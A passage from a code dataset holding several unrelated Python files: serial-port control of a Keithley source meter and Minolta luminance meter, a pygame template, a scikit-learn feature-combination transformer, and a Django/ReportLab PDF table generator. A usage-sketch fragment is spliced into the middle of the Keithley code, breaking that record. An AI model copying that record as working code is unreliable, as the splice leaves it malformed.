DOWN\\r')\r\n                        ser_keithley.write(b':READ?\\r')\r\n                        raw_data = ser_keithley.read(num_of_read)\r\n                        value_lists += [[float(i) for i in\r\n                                         raw_data.decode('ascii').strip().split(',')]]\r\n\r\n                ser_keithley.write(command.encode('utf-8'))\r\n\r\n        for value in value_lists:\r\n            v_list.append(np.array(value[::2]))\r\n            c_list.append(np.array(value[1::2]) * 1e3)\r\n        return v_list, c_list\r\n\r\n\r\n## TODO: RAISE EXCEPTION AND CLOSE SERIAL PORT IF ANY WRITE FAILURE OCCURS,\r\n## TO PREVENT `SerialException` ERROR.\r\ndef keithley(voltage):\r\n    voltf = float(voltage)\r\n    #voltfe = str(voltf).encode('utf-8')\r\n    ser_keithley = serial.Serial(port=\"COM7\", baudrate=38400, parity=serial.PARITY_NONE, bytesize=8, stopbits=1)\r\n\r\n    ser_keithley.write(b\"*RST\\r\") #Reset Keithley\r\n    ser_keithley.write(b\":SOUR:FUNC VOLT\\r\") #Set Voltage as SOURCE\r\n    ser_keithley.write(b\":SOUR:VOLT:MODE FIXED\\r\") #Fixed Voltage\r\n    
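A hedged usage sketch for the driver class above (the COM port and the SCPI command list are assumptions; single_scan expects ":READ?" to precede ":OUTP OFF" so the 28-byte reply is already on the wire):

commands = [
    "*RST\r", ":SOUR:FUNC VOLT\r", ":SOUR:VOLT:MODE FIXED\r",
    ":SOUR:VOLT:LEV {0}\r", ':SENS:FUNC "CURRENT"\r',
    ":FORM:ELEM VOLT, CURR\r", ":OUTP ON\r", ":READ?\r", ":OUTP OFF\r",
]
smu = Keithley_2400(port="COM7", baudrate=38400, command_list=commands)
volts, amps = smu.single_scan(1.2)   # returns the measured (voltage, current)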
ser_keithley.write(b\":SOUR:VOLT:LEV %f\\r\" % voltf) #Set Voltage from request\r\n #ser_keithley.write(b\":SOUR:VOLT:LEV \" + voltfe + \"\\r\")\r\n #voltf_fixed = bytes(\":SOUR:VOLT:LEV {0}\\r\".format(voltf))\r\n # ser_keithley.write(bytes(\":SOUR:VOLT:LEV {0}\\r\".format(voltf), encoding='utf8'))\r\n\r\n ser_keithley.write(b':SENS:FUNC \"CURRENT\"\\r') #Set Current as SENSOR\r\n ser_keithley.write(b':FORM:ELEM VOLT, CURR\\r') #Retrieve Voltage and Current only \r\n ser_keithley.write(b':SENS:VOLT:PROT 5\\r') #Cmpl voltage in Volt\r\n ser_keithley.write(b':SENS:CURR:PROT 0.5\\r') #Cmpl current in Ampere\r\n ser_keithley.write(b':SENS:CURR:NPLC 0.1\\r') #AC noise integrating time\r\n ser_keithley.write(b':OUTP ON\\r')\r\n ser_keithley.write(b':READ?\\r')\r\n \r\n raw_data = ser_keithley.read(28)\r\n\r\n ser_keithley.write(b':OUTP OFF\\r')\r\n \r\n values = [float(i) for i in raw_data.decode('utf-8').strip().split(',')]\r\n voltage = values[0]\r\n current = values[1]\r\n ser_keithley.close()\r\n return voltage, current\r\n\r\ndef Minolta():\r\n import serial\r\n\r\n ser_minolta = serial.Serial(port=\"COM5\", baudrate=4800, parity=serial.PARITY_EVEN, bytesize=7, stopbits=2)\r\n\r\n # setting_var = b'\\MDS02\\r\\n'\r\n message = b'\\MES\\r\\n'\r\n # ser_minolta.write(setting_var)\r\n ser_minolta.write(b'\\CLE\\r\\n')\r\n ser_minolta.write(message)\r\n raw_data = ser_minolta.read(11) #11 bits received\r\n\r\n # print(luminance)\r\n luminance = raw_data.decode('ascii')\r\n print('Luminance = ', luminance[4:-1], 'cd/m2')\r\n ser_minolta.close()\r\n \r\n return luminance[4:-2]\r\n\r\n\r\n# baudrate:\r\n# 38400 -- ph-splsim lab\r\n# 19200 -- ls-100 lab\r\nfor i in range(-12,13):\r\n voltage = i/10\r\n print(keithley(voltage))\r\n #print(\"voltf {0}\".format(voltage))\r\n #Minolta()\r\n #time.sleep(0.1)\r\n","repo_name":"euteryu/minolta-ls-100-luminance","sub_path":"src/old_keithley_minolta.py","file_name":"old_keithley_minolta.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16375723394","text":"\"\"\"\nMain entrypoint for game\n\"\"\"\nimport pygame\nimport settings\n\n\nclass Game:\n \"\"\"Representation of the Game itself\"\"\"\n def __init__(self):\n \"\"\"\n initialize pygame and create window\n \"\"\"\n pygame.init()\n #pygame.mixer.init() # for sound\n self.screen = pygame.display.set_mode((settings.WIDTH, settings.HEIGHT))\n pygame.display.set_caption(settings.TITLE)\n self.clock = pygame.time.Clock()\n\n\n\n def set_player_movement(self):\n \"\"\"\n Update any player movement here\n \"\"\"\n\n def start_game(self):\n \"\"\" Game Loop \"\"\"\n running = True\n while running:\n self.clock.tick(30)\n\n # Process input (events)\n for event in pygame.event.get():\n # check for closing window\n if event.type == pygame.QUIT:\n running = False\n\n # Update\n self.set_player_movement()\n #keys = pygame.key.get_pressed()\n #if keys[pygame.K_LEFT]:\n # pass\n # Render\n self.screen.fill(settings.Colors.BLACK)\n pygame.display.update()\n pygame.quit()\nif __name__ == \"__main__\":\n GAME = Game()\n GAME.start_game()\n","repo_name":"RAshkettle/pygame_template","sub_path":"game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40393401734","text":"from sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport numpy as np\nimport random\nimport 
time\nimport itertools\nfrom functools import wraps\nfrom multiprocessing import Pool\n# import ipdb\n\nclass AutoCombine(BaseEstimator, TransformerMixin):\n '''多进程k阶类别特征组合'''\n def __init__(self, cols, order, null_value, num_process, verbose, max_comb=4000):\n super().__init__()\n self.cols = cols\n self.order = order\n self.col_dicts = {}\n self.null_value = null_value\n self.combine_list = [i for i in itertools.combinations(cols, order)]\n self.verbose=verbose\n if len(self.combine_list)>max_comb:\n print('clip since reach max_comb:{}/{}'.format(len(self.combine_list), max_comb))\n self.combine_list = random.sample(self.combine_list, max_comb)\n else:\n print('totally {} combinations'.format(len(self.combine_list)))\n self.num_process=num_process\n if num_process!=None:\n self.sub_len = len(self.combine_list)//num_process+1\n self.sub_comb_list = [self.combine_list[x:x+self.sub_len] for x in range(0, len(self.combine_list), self.sub_len)]\n\n \n def _fit(self, x, combine_list):\n DF = pd.DataFrame()\n col_dicts={}\n for idx, col_names in enumerate(combine_list):\n new_name = 'comb('+','.join(col_names)+')'\n length=len(combine_list)\n if length!=1 and idx%(length//2)==0 and self.verbose==1:\n print('processing col: {}, {}/{}'.format(new_name, idx, length))\n DF[new_name] = (x[list(col_names)].astype(str)+'|').sum(axis=1)\n col_dicts[new_name] = DF[new_name].unique()\n return DF, col_dicts\n \n def fit(self, x, y=None):\n st = time.time()\n if self.num_process:\n print('------------------------{}-{}----------------------------'.format(self.__class__.__name__, 'fit()'))\n print('program is going to use multiprocessing with {} Ps'.format(self.num_process))\n p = Pool(self.num_process)\n rst = []\n for i in range(self.num_process): \n if i>len(self.sub_comb_list)-1: # 防止workers>len(sub_comb_list)报错\n print('num_works should be at most: {}'.format(self.sub_len))\n a = p.apply_async(self._fit, args=(x, self.sub_comb_list[i])) \n rst.append(a) \n p.close()\n p.join()\n new_x=rst[0].get()[0]\n for i in rst[1:]:\n new_x=new_x.join(i.get()[0])\n list_dic = [i.get()[1] for i in rst]\n for d in list_dic:\n self.col_dicts.update(d)\n else:\n new_x, col_dicts = self._fit(x, self.combine_list)\n self.col_dicts =col_dicts\n \n print('------------------------use:{} s----------------------------'.format(time.time()-st))\n return self\n \n def _transform(self, x, combine_list):\n DF = pd.DataFrame()\n for idx, col_names in enumerate(combine_list):\n new_name = 'comb('+','.join(col_names)+')'\n length = len(combine_list)\n if length!=1 and idx%(length//2)==0 and self.verbose==1:\n print('processing col: {}, {}/{}'.format(new_name, idx, length))\n tra_unique = self.col_dicts[new_name]\n# ipdb.set_trace()\n DF[new_name] = (x[list(col_names)].astype(str)+'|').sum(axis=1)\n # 凡是 test中存在, train中不存在的,变为null\n DF[new_name][~DF[new_name].isin(tra_unique)] = self.null_value\n return DF\n \n def transform(self, x):\n if self.num_process:\n st = time.time()\n print('------------------------{}-{}----------------------------'.format(self.__class__.__name__, 'transform()'))\n print('program is going to use multiprocessing with {} Ps'.format(self.num_process))\n p2 = Pool(self.num_process)\n rst = []\n for i in range(self.num_process):\n if i>len(self.sub_comb_list)-1:\n print('num_works should be at most: {}'.format(self.sub_len))\n aa = p2.apply_async(self._transform, args=(x, self.sub_comb_list[i])) \n rst.append(aa) \n p2.close()\n p2.join()\n new_x = pd.concat([i.get() for i in rst], axis=1)\n 
print('------------------------use:{} s----------------------------'.format(time.time()-st))\n return new_x\n else:\n print('will not use multi processing')\n return self._transform(x, self.combine_list)\n \n \nif __name__ == '__main__':\n data_path = './data'\n # test.csv train.csv train_target.csv\n tra_x = pd.read_csv(data_path + '/train.csv')\n tra_y = pd.read_csv(data_path + '/train_target.csv')\n final = tra_x.merge(tra_y,on='id')\n final['dist']= final.dist.apply(lambda x: int(x/100))\n random.seed(1)\n tra_id = set(random.sample(range(final.shape[0]),70000))\n val_id = set(range(final.shape[0])) - tra_id\n tra_id = [i for i in tra_id]\n val_id = [i for i in val_id]\n Train = final.iloc[tra_id,:]\n Valid = final.iloc[val_id,:]\n tra_x, tra_y = Train.drop('target', axis=1), Train.target\n val_x, val_y = Valid.drop('target', axis=1), Valid.target\n zz = tra_x.apply(lambda x: len(x.unique())).sort_values(ascending=False)\n small_cats = zz[zz<5].index.tolist()\n \n st=time.time()\n tbr = AutoCombine(cols=small_cats[:10], order=2, null_value=-999, num_process=5)\n z1 = tbr.fit(tra_x)\n z2 = tbr.transform(val_x)\n print(time.time()-st)","repo_name":"brakeman/general_pro","sub_path":"to_be_transfor/auto_feat/Piplines/AutoCombine_test.py","file_name":"AutoCombine_test.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8442262312","text":"import itertools\nfrom io import BytesIO\nfrom math import modf\n\nfrom django.http import HttpResponse\nfrom reportlab.lib import colors\nfrom reportlab.lib.enums import TA_CENTER\nfrom reportlab.lib.pagesizes import A4, landscape\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.units import mm, cm\nfrom reportlab.pdfgen import canvas\nfrom reportlab.platypus import BaseDocTemplate, PageTemplate, Paragraph, Table, TableStyle, Frame\nfrom reportlab.platypus.flowables import Flowable\n\nfrom mecc.apps.institute.models import Institute\nfrom mecc.apps.mecctable.models import ObjectsLink, StructureObject, Exam\nfrom mecc.apps.training.models import Training\nfrom mecc.apps.utils.documents_generator.utils.pdf import filter_content\nfrom mecc.apps.utils.queries import get_mecc_table_order\nfrom ..document import Document\n\n\nclass PreviewMeccTable(Document):\n\n def __init__(self, trainings, reference='both'):\n if trainings is not None:\n self.training = Training.objects.get(id=trainings)\n self.reference = reference\n self.respforms = True\n self.mecc_state = True\n self.title_header = \"Prévisualisation du tableau\"\n self.mecctable_header_line_1 = [\"OBJETS\", '', '', '', '', '', \"ÉPREUVES\"]\n\n self.make_watermark_attributes()\n self.doc_setup()\n self.make_styles()\n\n self.story = []\n\n def doc_setup(self):\n self.set_doc_title()\n self.set_response()\n self.set_doc_margins()\n\n self.buffer = BytesIO()\n\n self.document = BaseDocTemplate(\n filename=self.buffer,\n pagesize=landscape(A4),\n leftMargin=self.left_margin,\n rightMargin=self.right_margin,\n topMargin=self.top_margin,\n bottomMargin=self.bottom_margin,\n title=self.title,\n author=\"Université de Strasbourg\",\n showBoundary=0,\n )\n\n self.add_page_templates()\n\n def add_page_templates(self):\n frame_landscape = Frame(\n x1=self.left_margin,\n y1=self.bottom_margin,\n width=self.document.width,\n height=self.document.height,\n id='landscape_frame',\n showBoundary=0\n )\n\n landscape_pagetemplate = PageTemplate(\n id='landscape_pagetemplate',\n 
frames=[frame_landscape],\n onPage=self.footer_watermark\n )\n\n\n self.document.addPageTemplates([landscape_pagetemplate])\n\n def set_doc_title(self):\n self.title = \"Prévisualisation du tableau\"\n\n def set_response(self):\n self.response = HttpResponse(content_type='application/pdf')\n self.response['Content-Disposition'] = ('filename=\"%s.pdf\"' % self.title)\n\n def set_doc_margins(self):\n self.left_margin = self.right_margin = self.top_margin = self.bottom_margin = 10*mm\n\n def make_styles(self):\n self.styles = getSampleStyleSheet()\n self.styles.add(ParagraphStyle(\n name='CenterSmall',\n alignment=TA_CENTER,\n fontSize=8\n ))\n self.styles.add(ParagraphStyle(\n name='CenterSmallItalic',\n alignment=TA_CENTER,\n fontSize=8,\n fontName=\"Times-Italic\"\n ))\n self.styles.add(ParagraphStyle(\n name='SmallNormal',\n fontSize=8\n ))\n self.styles.add(ParagraphStyle(\n name='SmallBold',\n fontSize=8,\n fontName=\"Helvetica-Bold\"\n ))\n self.styles.add(ParagraphStyle(\n name='InversedBigBold',\n fontSize=11,\n fontName=\"Helvetica-Bold\",\n textColor=colors.white,\n ))\n\n def make_watermark_attributes(self, string='Prévisualisation', x=500, y=-75, rotation=40):\n self.watermark_string = string\n self.watermark_position_x = x\n self.watermark_position_y = y\n self.watermark_rotation = rotation\n\n def build_doc(self):\n self.write_preview_header()\n self.write_landscape_training_infos()\n self.write_table_title()\n self.write_mecctable()\n self.document.build(\n self.story,\n canvasmaker=LandscapeLeftNumberedCanvas\n )\n\n pdf = self.buffer.getvalue()\n self.buffer.close()\n self.response.write(pdf)\n\n return self.response\n\n def write_preview_header(self):\n self.story.append(\n Paragraph(\n \"\\\n %s\" % filter_content(self.title_header),\n self.styles['Normal']\n )\n )\n\n def write_landscape_training_infos(self):\n\n # ############ STYLES ################################\n main_style = [\n ('SPAN', (0, 1), (2, 1)),\n ('SPAN', (3, 0), (3, 1)),\n ('VALIGN', (0, 0), (2, 1), 'MIDDLE'),\n ('FACE', (0, 0), (1, 0), 'Helvetica-Bold'),\n ('SIZE', (0, 0), (2, 0), 11),\n ('TEXTCOLOR', (0, 0), (2, 1), colors.white),\n ('BACKGROUND', (0, 0), (-2, -2), colors.steelblue),\n ('BOX', (0, 0), (-2, -1), 1, colors.black),\n ('LINEABOVE', (0, -1), (-2, -1), 1, colors.black),\n # ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 3),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 3),\n ('TOPPADDING', (0, 0), (-1, -1), 3),\n # ('GRID', (0, 0), (-1, -1), 1, colors.green)\n ]\n\n side_style = [\n ('BOX', (0, 0), (-1, -1), 0.5, colors.steelblue),\n ('TEXTCOLOR', (0, 0), (-1, -1), colors.steelblue),\n ('FACE', (0, 0), (-1, -1), 'Helvetica-Bold'),\n ('FACE', (0, 1), (-1, 1), 'Helvetica'),\n ('SIZE', (0, 0), (-1, -1), 8),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n # ('GRID', (0, 0), (-1, -1), 1, colors.red)\n ]\n\n # ############ TABLE ################################\n date_cmp = self.training.date_val_cmp.strftime(\n \"%d/%m/%Y\") if self.training.date_val_cmp not in [None, ''] else \"Non\"\n date_des = self.training.date_visa_des.strftime(\n \"%d/%m/%Y\") if self.training.date_visa_des not in [None, ''] else \"Non\"\n date_cfvu = self.training.date_val_cfvu.strftime(\n \"%d/%m/%Y\") if self.training.date_val_cfvu not in [None, ''] else \"Non\"\n\n mecc_state_table = [\n [\"Etat de saisie :\"],\n [\"%s : %s %s : %s\" % (\n \"Règles\", self.training.get_progress_rule_display().lower(),\n \"Tableau\", 
self.training.get_progress_table_display().lower())\n ],\n [\"%s : %s\" % (\"Validation Composante\", date_cmp)],\n [\"%s : %s\" % (\"Visa DES\", date_des)],\n [\"%s : %s\" % (\"Validation CFVU\", date_cfvu)],\n ]\n\n if self.reference == 'without':\n ref_label = ''\n elif self.reference == 'with_rof':\n ref_label = \"Référence ROF : %s\" % self.training.ref_cpa_rof \\\n if self.training.ref_cpa_rof is not None else ''\n elif self.reference == 'both':\n ref_label = \"Référence ROF : %s\\n\\nRéférence APOGEE : %s\" % (\n self.training.ref_cpa_rof if self.training.ref_cpa_rof is not None \\\n else '',\n self.training.ref_si_scol if self.training.ref_si_scol is not None \\\n else ''\n )\n else:\n ref_label = \"Référence APOGEE : %s\" % self.training.ref_si_scol\n\n table = [\n [\n Paragraph(\"%s\" % filter_content(self.training.label), self.styles['InversedBigBold']),\n \"%s - %s\" % (\n self.training.get_MECC_type_display(),\n self.training.get_session_type_display()\n ),\n ref_label,\n Table(\n mecc_state_table,\n style=side_style\n ) if self.mecc_state else ''\n ],\n [\n Paragraph(\n \"Responsable(s) : \\\n %s\" % \", \".join(\n [e for e in self.training.get_respform_names]\n ),\n self.styles['Normal']\n ),\n '',\n '',\n ''\n ]\n ]\n\n final_table = Table(\n table,\n style=main_style,\n colWidths=[\n 9*cm if self.mecc_state else 12*cm,\n 5*cm if self.mecc_state else 7.15*cm,\n 6.5*cm if self.mecc_state else 8.5*cm,\n 7.15*cm if self.mecc_state else 0*cm\n ],\n spaceBefore = 10,\n )\n\n self.story.append(final_table)\n\n def write_table_title(self):\n table_title_style = [\n ('FACE', (-1, -1), (-1, -1), 'Helvetica'),\n ('FACE', (0, 0), (0, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (0, 0), (0, 0), colors.steelblue),\n ('SIZE', (0, 0), (0, 0), 12),\n ('SIZE', (-1, -1), (-1, -1), 10),\n ('ALIGN', (0, 0), (0, 0), 'LEFT'),\n ('ALIGN', (-1, -1), (-1, -1), 'RIGHT'),\n # ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n # ('GRID', (0, 0), (-1, -1), 1, colors.green)\n ]\n table_title = Table(\n [\n [\"Tableau MECC\", \"(E = Écrit, O = Oral, A = Autre)\"]\n ],\n style=table_title_style,\n colWidths=[\n '50%',\n '50%'\n ],\n spaceAfter=8,\n spaceBefore=5\n )\n\n self.story.append(table_title)\n\n def write_mecctable(self):\n\n current_structures = StructureObject.objects.filter(\n code_year=self.training.code_year\n )\n current_links = ObjectsLink.objects.filter(\n code_year=self.training.code_year\n )\n # Ne pas inclure les objets dont le témoin is_existing_rof = False\n # si composante en appui ROF ou formation de type Catalogue NS cf #131\n supply_cmp = Institute.objects.get(code=self.training.supply_cmp)\n if supply_cmp.ROF_support or self.training.degree_type.ROF_code == 'EA':\n current_links = current_links.exclude(is_existing_rof=False)\n current_exams = Exam.objects.filter(\n code_year=self.training.code_year\n )\n\n training_is_ccct = True if self.training.MECC_type == 'C' else False\n\n root_link = current_links.filter(\n id_parent='0',\n id_training=self.training.id).order_by(\n 'order_in_child').distinct()\n links = get_mecc_table_order(\n [e for e in root_link],\n [],\n current_structures, current_links,\n current_exams, self.training, all_exam=True\n )\n\n col_width, width_exams, mecc_table_style, big_table = \\\n self.make_mecctable_header(training_is_ccct)\n\n global count_row\n count_row = 2\n background_blue = []\n\n # ############ 
POPULATING TABLE ################################\n\n def write_the_table(what):\n \"\"\"\n Recursively add data in strucuture\n \"\"\"\n global count_row\n count_row += 1\n\n if what.get('rank') == 0:\n background_blue.append(count_row)\n\n struct = what.get('structure')\n link = what.get('link')\n exams_1 = what.get('exams_1')\n exams_2 = what.get('exams_2')\n exams_empty = [['', '', '', '', '', '', '', '', '', '', '', '']] \\\n if self.training.session_type != '1' else \\\n [['', '', '', '', '', '']]\n\n def formated(number):\n \"\"\"\n Remove trailing 0\n \"\"\"\n frac, whole = modf(number)\n if frac == 0:\n return int(whole)\n return str(number).rstrip('0')\n\n def write_exams(list_1, list_2):\n exam_table = []\n for ex_1, ex_2 in itertools.zip_longest(list_1, list_2):\n ex_1_table = [\n formated(ex_1.coefficient) if ex_1 is not None else '',\n [\n Paragraph(filter_content(ex_1.label) if ex_1 else '',\n self.styles['SmallNormal']),\n Paragraph(\n \"\" + filter_content(ex_1.additionnal_info) \\\n if ex_1 and ex_1.additionnal_info \\\n else \"\" + \"\",\n self.styles['SmallNormal'])\n ],\n ex_1.type_exam if ex_1 is not None else '',\n ex_1.text_duration if ex_1 is not None else '',\n '' if ex_1 is None \\\n else ex_1.convocation if not training_is_ccct \\\n else ex_1.get_type_ccct_display(),\n ex_1.eliminatory_grade if ex_1 is not None else '',\n ex_1.threshold_session_2 if ex_1 is not None else '',\n ]\n\n ex_2_table = [\n formated(ex_2.coefficient) if ex_2 is not None else '',\n [Paragraph(filter_content(ex_2.label) if ex_2 is not None else '', self.styles[\n 'SmallNormal']), Paragraph(\"\" + ex_2.additionnal_info + \"\" if ex_2.additionnal_info is not None else \"\",\n self.styles['SmallNormal'])],\n ex_2.type_exam if ex_2 is not None else '',\n ex_2.text_duration if ex_2 is not None else '',\n ex_2.eliminatory_grade if ex_2 is not None else '',\n ] if ex_2 is not None else ['', '', '', '', '']\n if self.training.session_type != '1':\n ex_1_table.extend(ex_2_table)\n else:\n ex_1_table.pop()\n exam_table.append(ex_1_table)\n exam_table = exam_table if len(exam_table) > 0 else exams_empty\n if exam_table == exams_empty:\n # TODO: calculate empty space to set rowHeights in order to\n # avoid blank in table\n pass\n inner_table = Table(\n exam_table, colWidths=width_exams, rowHeights=None)\n inner_table.setStyle(TableStyle(\n [('INNERGRID', (0, 0), (-1, -1), 0.1, colors.black),\n ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n # ('LEFTPADDING', (0, 0), (-1, -1), 0),\n # ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n ]))\n return inner_table\n\n ref_scol = struct.ref_si_scol if struct.ref_si_scol else \"\" # FIX bug with rof data\n ref_data = (\n Paragraph(struct.ROF_ref, self.styles['CenterSmall']),\n Paragraph(ref_scol, self.styles['CenterSmall'])\n ) if self.reference == 'both' \\\n else Paragraph(struct.ROF_ref, self.styles['CenterSmall']) if self.reference == 'with_rof' \\\n else Paragraph(ref_scol, self.styles['CenterSmall']) if self.reference == 'with_si' \\\n else Paragraph('', self.styles['CenterSmall'])\n\n object_line = [\n Paragraph(\n \"%s \" % (what.get('rank')*10, filter_content(struct.label)),\n self.styles['SmallBold'] if what.get('rank') == 0 \\\n or what.get('structure').nature == 'UE' \\\n else self.styles['SmallNormal']\n ),\n Paragraph(\n struct.get_respens_name if not struct.external_name \\\n else 
struct.external_name,\n self.styles['CenterSmall'] if not struct.external_name else \\\n self.styles['CenterSmallItalic']\n ),\n [ref_data],\n '30' if self.training.degree_type.ROF_code in self.training_types_for_which_to_display_30_ects\\\n and struct.nature == 'SE'\\\n else struct.ECTS_credit if struct.ECTS_credit else '-',\n formated(link.coefficient) if link.coefficient else '',\n link.eliminatory_grade,\n write_exams(exams_1, exams_2)\n ]\n if self.respforms:\n if self.reference == 'without':\n object_line.pop(2)\n else:\n object_line.pop(1)\n if self.reference == 'without':\n object_line.pop(1)\n\n big_table.append(object_line)\n\n for e in what.get('children'):\n write_the_table(e)\n\n for e in links:\n write_the_table(e)\n\n for e in range(3, len(big_table)):\n if self.respforms:\n if self.reference == 'without':\n mecc_table_style.append(('SPAN', (5, e), (-1, e)))\n else:\n mecc_table_style.append(('SPAN', (6, e), (-1, e)))\n else:\n if self.reference == 'without':\n mecc_table_style.append(('SPAN', (4, e), (-1, e)))\n else:\n mecc_table_style.append(('SPAN', (5, e), (-1, e)))\n\n for e in background_blue:\n mecc_table_style.append(\n ('BACKGROUND', (0, e), (-1, e), colors.lightsteelblue)\n )\n\n col_width.extend(width_exams)\n\n mecc_table = Table(\n big_table,\n style=mecc_table_style,\n colWidths=col_width,\n repeatRows=3\n )\n\n self.story.append(mecc_table)\n\n def make_mecctable_header(self, training_is_ccct):\n\n references = '%s' % (\n \"Référence ROF
Référence APOGEE\" \\\n if self.reference == \"both\" \\\n else \"Référence ROF\" if self.reference == \"with_rof\" \\\n else 'Référence APOGEE' if self.reference == \"with_si\" \\\n else ''\n )\n\n # ############ TABLE STRUCUTURE ################################\n\n mecc_table_style = [\n # POLICE\n ('ALIGN', (0, 0), (-1, -1), 'CENTRE'),\n ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n ('FACE', (0, 1), (-1, 1), 'Helvetica-Bold'),\n # FUSION DE CELLULES\n ('SPAN', (0, 1), (0, 2)),\n ('SPAN', (1, 1), (1, 2)),\n ('SPAN', (2, 1), (2, 2)),\n ('SPAN', (3, 1), (3, 2)),\n ('SPAN', (4, 1), (4, 2)),\n # MARGES INTERIEURES DES CELLULES\n ('LEFTPADDING', (0, 0), (-1, -1), 0),\n ('RIGHTPADDING', (0, 0), (-1, -1), 0),\n ('BOTTOMPADDING', (0, 0), (-1, -1), 0),\n ('TOPPADDING', (0, 0), (-1, -1), 0),\n # QUADRILLAGE\n ('GRID', (0, 0), (-1, -1), 0.5, colors.black)\n ]\n\n # - Ugly but tables are almost always ugly\n mecctable_header_line_2 = [\n 'Intitulé',\n 'Responsable',\n Paragraph(\n references,\n self.styles['CenterSmall']\n ),\n VerticalText('Crédit ECTS'),\n VerticalText('Coefficient'),\n VerticalText('Seuil compens.'),\n 'Session principale' if self.training.session_type != '1' \\\n else 'Session unique',\n '', '', '', '', '', '',\n 'Session de rattrapage'\n ]\n\n mecctable_header_line_3 = [\n '', '', '', '', '', '',\n VerticalText('Coefficient'),\n 'Intitulé',\n VerticalText('Type'),\n VerticalText('Durée'),\n VerticalText(\n 'Convocation' if not training_is_ccct else 'CC/CT'),\n VerticalText('Seuil compens.'),\n VerticalText(' Report session 2 '),\n VerticalText('Coefficient'),\n 'Intitulé',\n VerticalText('Type'),\n VerticalText('Durée'),\n VerticalText('Seuil compens.')\n ]\n\n if self.respforms:\n if self.reference == 'without':\n mecctable_header_line_2.pop(2)\n mecctable_header_line_3.pop(2)\n\n mecc_table_style.extend([\n ('FACE', (0, 0), (4, 2), 'Helvetica-Bold'),\n ('FACE', (5, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (5, 0), (-1, 0), colors.white),\n ('SPAN', (0, 0), (4, 0)),\n ('SPAN', (5, 0), (-1, 0)),\n ('BACKGROUND', (5, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:6],\n mecctable_header_line_3[:11]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [9.25*cm, 3.5*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 9.25*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (11, 1)),\n ('SPAN', (12, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (11, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (11, 2), colors.lightgrey),\n ('BACKGROUND', (12, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (12, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6.6*cm, 2.25*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4.6*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4.6*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecc_table_style.extend([\n ('FACE', (0, 0), (5, 2), 'Helvetica-Bold'),\n ('FACE', (6, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (6, 0), (-1, 0), colors.white),\n ('SPAN', (5, 1), (5, 2)),\n ('SPAN', (0, 0), (5, 0)),\n ('SPAN', (6, 0), (-1, 0)),\n ('BACKGROUND', (6, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n 
